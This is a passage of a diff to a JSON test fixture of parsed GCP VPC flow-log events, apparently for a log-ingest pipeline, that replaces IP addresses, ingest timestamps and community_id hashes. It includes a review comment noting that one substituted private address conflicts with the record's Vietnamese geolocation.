"67.43.156.14", "packets": 246 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:orgrC+fuNweNF7YN8VWuWIAnY80=", + "community_id": "1:6IVVaT8jMDNLIBHaC8OISRVYWS4=", "bytes": 281147, "name": "default", "transport": "tcp", @@ -2258,7 +2258,7 @@ }, "related": { "ip": [ - "198.51.100.248", + "67.43.156.14", "10.87.40.76" ] }, 
@@ -2295,8 +2295,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868489900Z", - "original": "{\"insertId\":\"ut8lbrffooxz9\",\"jsonPayload\":{\"bytes_sent\":\"281147\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33542,\"protocol\":6,\"src_ip\":\"198.51.100.248\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565272745Z\",\"packets_sent\":\"246\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.150720950Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", + "ingested": "2021-12-09T13:37:46.391282700Z", + "original": 
"{\"insertId\":\"ut8lbrffooxz9\",\"jsonPayload\":{\"bytes_sent\":\"281147\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33542,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565272745Z\",\"packets_sent\":\"246\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.150720950Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.150720950Z", "end": "2019-06-14T03:49:59.565272745Z", @@ -2323,18 +2323,18 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33548, "bytes": 63590, "domain": "kibana", - "ip": "203.0.113.134", + "ip": "67.43.156.13", "packets": 340 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:komMvAI/1VsC7c9d9LuzM29I9NY=", + "community_id": "1:+S3/6PF+UXU7wlJD68HIrz0Mo6c=", "bytes": 63590, "name": "default", "transport": "tcp", @@ -2356,7 +2356,7 @@ }, "related": { "ip": [ - "203.0.113.134", + "67.43.156.13", "10.139.99.242" ] }, 
@@ -2393,8 +2393,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868493400Z", - "original": "{\"insertId\":\"ut8lbrffooxyr\",\"jsonPayload\":{\"bytes_sent\":\"63590\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.134\",\"src_port\":33548},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:48.537763242Z\",\"packets_sent\":\"340\",\"reporter\":\"DEST\",\"rtt_msec\":\"50\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:05.147252064Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", + "ingested": "2021-12-09T13:37:46.391288500Z", + "original": 
"{\"insertId\":\"ut8lbrffooxyr\",\"jsonPayload\":{\"bytes_sent\":\"63590\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33548},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:48.537763242Z\",\"packets_sent\":\"340\",\"reporter\":\"DEST\",\"rtt_msec\":\"50\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:05.147252064Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:40:05.147252064Z", "end": "2019-06-14T03:49:48.537763242Z", @@ -2415,9 +2415,9 @@ "as": { "number": 15169 }, - "address": "203.0.113.12", + "address": "67.43.156.13", "port": 34836, - "ip": "203.0.113.12" + "ip": "67.43.156.13" }, "source": { "address": "10.87.40.76", @@ -2431,7 +2431,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:LQLr5Clnxf10OYhT92IBepyH/y0=", + "community_id": "1:qoQEykwJ/Fqctc/3YyFJSUPTETc=", "bytes": 1780, "transport": "tcp", "type": "ipv4", @@ -2446,7 +2446,7 @@ "related": { "ip": [ "10.87.40.76", - "203.0.113.12" + "67.43.156.13" ] }, "gcp": { 
@@ -2470,8 +2470,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868496700Z", - "original": "{\"insertId\":\"ut8lbrffooxyy\",\"jsonPayload\":{\"bytes_sent\":\"1780\",\"connection\":{\"dest_ip\":\"203.0.113.12\",\"dest_port\":34836,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:48:39.076420731Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:48:38.961050187Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", + "ingested": "2021-12-09T13:37:46.391292500Z", + "original": 
"{\"insertId\":\"ut8lbrffooxyy\",\"jsonPayload\":{\"bytes_sent\":\"1780\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":34836,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:48:39.076420731Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:48:38.961050187Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:10.845445834Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:10.845445834Z\"}", "kind": "event", "start": "2019-06-14T03:48:38.961050187Z", "end": "2019-06-14T03:48:39.076420731Z", @@ -2500,17 +2500,17 @@ "as": { "number": 45899 }, - "address": "192.0.2.165", + "address": "192.168.2.165", "port": 59623, "bytes": 1239, - "ip": "192.0.2.165", + "ip": "192.168.2.165", "packets": 18 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:n2izIhQ6f30pRxm58NLCxNXryuI=", + "community_id": "1:FsRs9Upw/72M8FLScc+hnC6ByYQ=", "bytes": 1239, "transport": "tcp", "type": "ipv4", @@ -2524,7 +2524,7 @@ }, "related": { "ip": [ - "192.0.2.165", + "192.168.2.165", "10.139.99.242" ] }, 
@@ -2549,8 +2549,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868500100Z", - "original": "{\"insertId\":\"1ulp77rfdvho4g\",\"jsonPayload\":{\"bytes_sent\":\"1239\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":22,\"protocol\":6,\"src_ip\":\"192.0.2.165\",\"src_port\":59623},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:40:52.361155668Z\",\"packets_sent\":\"18\",\"reporter\":\"DEST\",\"rtt_msec\":\"233\",\"src_location\":{\"asn\":45899,\"city\":\"Vĩnh Yên\",\"continent\":\"Asia\",\"country\":\"vnm\",\"region\":\"Vinh Phuc Province\"},\"start_time\":\"2019-06-14T03:40:46.541094678Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", + "ingested": "2021-12-09T13:37:46.391296900Z", + "original": "{\"insertId\":\"1ulp77rfdvho4g\",\"jsonPayload\":{\"bytes_sent\":\"1239\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":22,\"protocol\":6,\"src_ip\":\"192.168.2.165\",\"src_port\":59623},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:40:52.361155668Z\",\"packets_sent\":\"18\",\"reporter\":\"DEST\",\"rtt_msec\":\"233\",\"src_location\":{\"asn\":45899,\"city\":\"Vĩnh Yên\",\"continent\":\"Asia\",\"country\":\"vnm\",\"region\":\"Vinh Phuc 
Province\"},\"start_time\":\"2019-06-14T03:40:46.541094678Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:40:46.541094678Z", "end": "2019-06-14T03:40:52.361155668Z", @@ -2571,10 +2571,10 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "domain": "elasticsearch", - "ip": "198.51.100.248" + "ip": "67.43.156.14" }, "source": { "address": "10.87.40.76", @@ -2588,7 +2588,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:U8onVg/hApWe9WsWGFifAt6Xktg=", + "community_id": "1:VmSf9DDKsJGi5cMJABVFKp5r22M=", "bytes": 63853, "name": "default", "transport": "tcp", @@ -2611,7 +2611,7 @@ "related": { "ip": [ "10.87.40.76", - "198.51.100.248" + "67.43.156.14" ] }, "gcp": { 
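Review bot: In the `@@ -2549` hunk the substituted source address `192.168.2.165` is an RFC 1918 private address, yet the same `event.original` string still carries `src_location` with `asn` 45899, city `Vĩnh Yên` and country `vnm`, i.e. a flow that the log describes as arriving from the internet; every other substitution in this chunk keeps a public address (`67.43.156.13`/`.14`), so this one record is now internally inconsistent. If the pipeline's GeoIP/ASN enrichment keys off `source.ip` (not visible here), this fixture now exercises the private-address branch instead of the public one it documents, and any `source.geo`/`source.as` expectations outside the hunk may have changed without that being the intent; the `as.number` on the new side is copied from the payload's `src_location.asn`, so it does not confirm enrichment either way. I would either pick another address from the public set the rest of this diff uses (e.g. `67.43.156.15`, a constructed example) and regenerate so `community_id` and `related.ip` follow, or add a line to the test config explaining why a private address is intended for this event. The enclosing event object begins and ends outside the hunk.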
@@ -2647,8 +2647,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868503400Z", - "original": "{\"insertId\":\"1ulp77rfdvho5r\",\"jsonPayload\":{\"bytes_sent\":\"63853\",\"connection\":{\"dest_ip\":\"198.51.100.248\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33552},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:55.213244028Z\",\"packets_sent\":\"363\",\"reporter\":\"SRC\",\"rtt_msec\":\"2\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.075811571Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", + "ingested": "2021-12-09T13:37:46.391301900Z", + "original": 
"{\"insertId\":\"1ulp77rfdvho5r\",\"jsonPayload\":{\"bytes_sent\":\"63853\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33552},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:55.213244028Z\",\"packets_sent\":\"363\",\"reporter\":\"SRC\",\"rtt_msec\":\"2\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.075811571Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:40:06.075811571Z", "end": "2019-06-14T03:49:55.213244028Z", @@ -2675,17 +2675,17 @@ "as": { "number": 15169 }, - "address": "198.51.100.107", + "address": "67.43.156.14", "port": 33924, "bytes": 1458, - "ip": "198.51.100.107", + "ip": "67.43.156.14", "packets": 7 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:ji6ZJhSkwxeKiorTmyrgBE0/o+c=", + "community_id": "1:zZLAweyUiKKYNJrw7Pxer9kCofQ=", "bytes": 1458, "transport": "tcp", "type": "ipv4", @@ -2699,7 +2699,7 @@ }, "related": { "ip": [ - "198.51.100.107", + "67.43.156.14", "10.87.40.76" ] }, 
@@ -2724,8 +2724,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868506900Z", - "original": "{\"insertId\":\"1ulp77rfdvho5k\",\"jsonPayload\":{\"bytes_sent\":\"1458\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"198.51.100.107\",\"src_port\":33924},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:46:20.745658276Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:46:20.634435179Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", + "ingested": "2021-12-09T13:37:46.391306600Z", + "original": 
"{\"insertId\":\"1ulp77rfdvho5k\",\"jsonPayload\":{\"bytes_sent\":\"1458\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":33924},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:46:20.745658276Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:46:20.634435179Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:46:20.634435179Z", "end": "2019-06-14T03:46:20.745658276Z", @@ -2746,10 +2746,10 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33534, "domain": "kibana", - "ip": "203.0.113.134" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -2763,7 +2763,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:pYIEYHtraTMNgdi3XDEMGSH5LV4=", + "community_id": "1:kmu70zI5WDvD+rP/FihJUhIgim4=", "bytes": 252397, "name": "default", "transport": "tcp", @@ -2786,7 +2786,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.134" + "67.43.156.13" ] }, "gcp": { 
@@ -2822,8 +2822,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868510300Z", - "original": "{\"insertId\":\"1ulp77rfdvho55\",\"jsonPayload\":{\"bytes_sent\":\"252397\",\"connection\":{\"dest_ip\":\"203.0.113.134\",\"dest_port\":33534,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.597088427Z\",\"packets_sent\":\"260\",\"reporter\":\"SRC\",\"rtt_msec\":\"311\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.075942176Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", + "ingested": "2021-12-09T13:37:46.391310300Z", + "original": 
"{\"insertId\":\"1ulp77rfdvho55\",\"jsonPayload\":{\"bytes_sent\":\"252397\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33534,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.597088427Z\",\"packets_sent\":\"260\",\"reporter\":\"SRC\",\"rtt_msec\":\"311\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.075942176Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": "event", "start": "2019-06-14T03:40:06.075942176Z", "end": "2019-06-14T03:49:59.597088427Z", @@ -2844,10 +2844,10 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33694, "domain": "kibana", - "ip": "203.0.113.134" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -2861,7 +2861,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:vLK9hCfMg91TvjmTPfnw8bfG514=", + "community_id": "1:YFlTqXDJr36riIZMLbrmKhw38gg=", "bytes": 205787, "name": "default", "transport": "tcp", @@ -2884,7 +2884,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.134" + "67.43.156.13" ] }, "gcp": { 
@@ -2920,8 +2920,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868513900Z", - "original": "{\"insertId\":\"1ulp77rfdvho60\",\"jsonPayload\":{\"bytes_sent\":\"205787\",\"connection\":{\"dest_ip\":\"203.0.113.134\",\"dest_port\":33694,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565117754Z\",\"packets_sent\":\"265\",\"reporter\":\"SRC\",\"rtt_msec\":\"216\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:05.566551903Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", + "ingested": "2021-12-09T13:37:46.391314900Z", + "original": 
"{\"insertId\":\"1ulp77rfdvho60\",\"jsonPayload\":{\"bytes_sent\":\"205787\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33694,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565117754Z\",\"packets_sent\":\"265\",\"reporter\":\"SRC\",\"rtt_msec\":\"216\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:05.566551903Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:11.981912845Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:11.981912845Z\"}", "kind": 